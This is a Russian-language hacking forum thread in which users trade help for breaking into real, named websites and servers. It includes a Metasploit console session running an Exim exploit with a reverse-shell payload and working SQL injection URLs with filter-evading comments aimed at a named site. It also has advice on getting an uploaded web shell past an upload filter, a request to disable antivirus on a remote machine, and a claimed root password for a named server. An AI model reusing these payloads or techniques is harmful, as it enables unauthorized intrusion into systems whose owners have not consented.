Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. p0deje

    p0deje New Member

    Joined:
    29 Aug 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Столкнулся со следующей проблемой. На сайте крутится Exim 4.69.

    Вывод nmap:
    25/tcp open smtp Exim smtpd 4.69

    Пытаюсь использовать готовый эксплойт в Metsploit - http://www.metasploit.com/modules/exploit/unix/smtp/exim4_string_format

    Вывод консоли:
    msf > use unix/smtp/exim4_string_format
    msf exploit(exim4_string_format) > set LHOST xxx
    LHOST => xxx
    msf exploit(exim4_string_format) > set RHOST yyy
    RHOST => yyy
    msf exploit(exim4_string_format) > set Payload generic/shell_reverse_tcp
    Payload => generic/shell_reverse_tcp
    msf exploit(exim4_string_format) > exploit
    [-] Handler failed to bind to xxx:4444
    [*] Started reverse handler on 0.0.0.0:4444
    [*] Server: yyy ESMTP Exim 4.69 #1 Sun, 12 Dec 2010 11:00:32 -0600
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
    [*] EHLO: yyy Hello xxx [xxx]
    [*] EHLO: 250-SIZE 52428800
    [*] EHLO: 250-PIPELINING
    [*] EHLO: 250-AUTH PLAIN LOGIN
    [*] EHLO: 250-STARTTLS
    [*] EHLO: 250 HELP
    [*] Determined our hostname is xxx and IP address is xxx
    [*] MAIL: 250 OK
    [*] RCPT: 550-xxx (xxx) [xxx] is currently
    550-not permitted to relay through this server. Perhaps you have not logged
    550-into the pop/imap server in the last 30 minutes or do not have SMTP
    550 Authentication turned on in your email client.
    [*] DATA: 503-All RCPT commands were rejected with this error:
    503-xxx (xxx.com) [xxx] is currently
    503-not permitted to relay through this server. Perhaps you have not logged
    503-into the pop/imap server in the last 30 minutes or do not have SMTP
    503-Authentication turned on in your email client.
    503 Valid RCPT command must precede DATA
    [*] Constructing initial headers ...
    [*] Constructing HeaderX ...
    [*] Constructing body ...
    [*] Sending 50 megabytes of data...
    [-] Exploit exception: Broken pipe
    [*] Exploit completed, but no session was created.

    Что это за Broken pipe такой? Кто-нибудь вообще пробовал этот сплойт?

    На другом сервере выдает:
    [*] MAIL: 250 OK
    [*] RCPT: 550-"JunkMail rejected - xxx (xxx.com) 550-[xxx]:50524 is in an RBL, see 550 http://www.spamhaus.org/query/bl?ip=xxx"
    [-] Exploit exception: end of file reached
    [*] Exploit completed, but no session was created.

    Тут я тоже ничего не понимю
     
  2. Darklamar

    Darklamar New Member

    Joined:
    11 Dec 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Может порт 4444 защищен?
     
  3. p0deje

    p0deje New Member

    Joined:
    29 Aug 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    4444 порт биндится на моей машине и с ним все ок
     
  4. Darklamar

    Darklamar New Member

    Joined:
    11 Dec 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    "Handler failed to bind to xxx:4444" походу не забиндился порт
     
  5. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    http://www.alienzero.com/agent/resulttype.asp?probe='

    Как ваще это крутить? Нашел по этой уязвимости http://1337db.com/exploits/15056
    Подскажите плз.
     
    _________________________
  6. DesCent

    DesCent Banned

    Joined:
    9 Jul 2010
    Messages:
    276
    Likes Received:
    51
    Reputations:
    16
    Если верить вики, то Джет - это то же, что и Access, по идее так же должно и крутиться.
    Мб стоит попробовать по этой статейке: https://forum.antichat.ru/showthread.php?p=2193060 ?
    З.Ы. Самому интересно.
     
  7. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не выводяться таблицы!

    http://www.copelandfurniture.com/subcategory.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,4,5,table_name,7,8,9+from+information_schema.tables+--+
     
  8. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    http://www.copelandfurniture.com/subcategory.php?id=-1+/*!union*/+select+1,2,3,4,5,/*!table_name*/,7,8,9+from+information_schema.tables+limit+0,1+--+
     
    1 person likes this.
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.copelandfurniture.com/subcategory.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,4,5,/*!unhex%28hex%28table_name%29%29*/,7,8,9+from+information_schema.tables+--+

    часто вижу как ты выкладываешь сюда скули недокрученные, а подумать чуток? вот тебе таблы, без лимита все сразу
     
    2 people like this.
  10. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Помогите, нашел уязвимость на сайте, залил shell, все отлично, прошло 8 дней и тут его запилили, точнее он остался, но при его вызове этот скрипт переходит в скачку, словно простой файл. Штакетник залить не дает, файлы других форматов спокойно открывает(тестил html), вот вопрос, как это обойти и есть ли шелы других форматов(html, shtml, asp)?
     
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    php3,phtml,php5....
     
  12. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Попробовал, не помогает, все равно срубает, он просто расширение любое переводи в php и срубает, например если залить 1.phtml, на сервере он будет лежать как "1." и если переписать php, начинает скачивать....Какие еще есть варианты?
     
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    прописанно в .htaccess ..попробуй залить shell.php.jpg, ищи инклюды также на сайте..
     
  14. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Чудеса какие то, все та же проблема- стирает все после ".". Напишу в ПМ, поможешь?
     
  15. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Чото не крутится, или кручу криво. Короче хелп плиз, а то у меня есть Н таких сайтов (из Гугла), было бы отлично раскрутить.
    Буду весьма благодарен.
     
    _________________________
  16. Darklamar

    Darklamar New Member

    Joined:
    11 Dec 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Каким образом можно отключить службу OpenService на Windows? Из-за нее не могу отключить службы антивирей на удаленном компе.
     
  17. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    http://shop.guidesqld.org/store/showCart.shop
    post
    параметр idProduct=1082'
    посмотрите кто ни буль есть ли уязвимость
     
  18. Le Fruit

    Le Fruit New Member

    Joined:
    13 Dec 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    не увидел там уязвимости
     
  19. valyka80

    valyka80 Banned

    Joined:
    14 Jun 2010
    Messages:
    163
    Likes Received:
    20
    Reputations:
    16
    Есть root пароль на сервак

    a1tv.ru

    там открыто всего 2 порта
    80 и 443
    не могу зацепиться,как попасть туда.
     
  20. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '&'.

    /includes/databaseFunctions.shop, line 31

    по-моему кроме сообщение об ошибке, больше ничего полезного не вывести
     
Thread Status:
Not open for further replies.